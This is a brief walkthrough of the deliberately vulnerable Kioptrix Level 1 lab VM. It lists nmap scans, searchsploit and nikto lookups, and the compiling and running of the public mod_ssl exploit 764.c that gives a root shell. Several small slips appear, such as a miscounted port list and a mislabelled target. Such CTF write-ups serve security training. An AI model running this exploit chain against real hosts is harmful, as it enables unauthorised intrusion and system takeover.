Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Importing to VirtualBox: https://medium.com/uzair-ahmed/how-to-import-kioptrix-level-1-into-virtual-box-d83e8638be9d
- Network Scan
nmap -sn <ip>/24The target’s IP is 10.0.2.6.
2. Port scan
nmap -Pn 10.0.2.6There’re 5 ports: 22, 80, 111, 139, 443, 32768.
3. High port scan
nmap -Pn -p1000- 10.0.2.6Nothing more came out from the previous scan.
4. OS and service scan
nmap -A -p 22,80,111,139,443,32768 10.0.2.6
5. Vuln scan
nmap --script vuln -p 22,80,111,139,443,32768 10.0.2.6There’re interesting pages on the HTTP service (port 80).
There’re possible vulnerabilities on samba and SMB.
6. Seach exploit on SSH (port 22)
searchsploit OpenSSH 2.9p2
searchsploit -m 45001
Read the script, it needs a username and password. I’ll put a pause on this method.
7. Seach exploit on HTTP (port 80)
nikto -h http://10.0.2.6After reading, I’ll start w/ this one, “Remote Shell” — OSVDB-756 — mod_ssl 2.8.4
searsploit mod_sslThere’re 3 C-codes.
Let’s start w/ 764.c
searchsploit -m 764
Read the script, there’s a compiling command.
gcc -o myexploit 764.c -lcryptoError!!! After googling I found a fix.
Fix: https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/
Follow the steps and compile again. I save it as “764_fix.c”.
Run the compiled script
./myexploit
I have to use the correct target. Looking up at the previous scan. The apache version is 1.3.20. There are 2 possibilities, 0x6a and 0x6b.
Run the first target, 0x6a
./myexploit 0x6a 10.0.2.6Failed!!!
Run the first target, 0x6a
./myexploit 0x6b 10.0.2.6After running the script, the machine downloaded ptrace script and ran it automatically.
Verify user
whoamiI’m root.
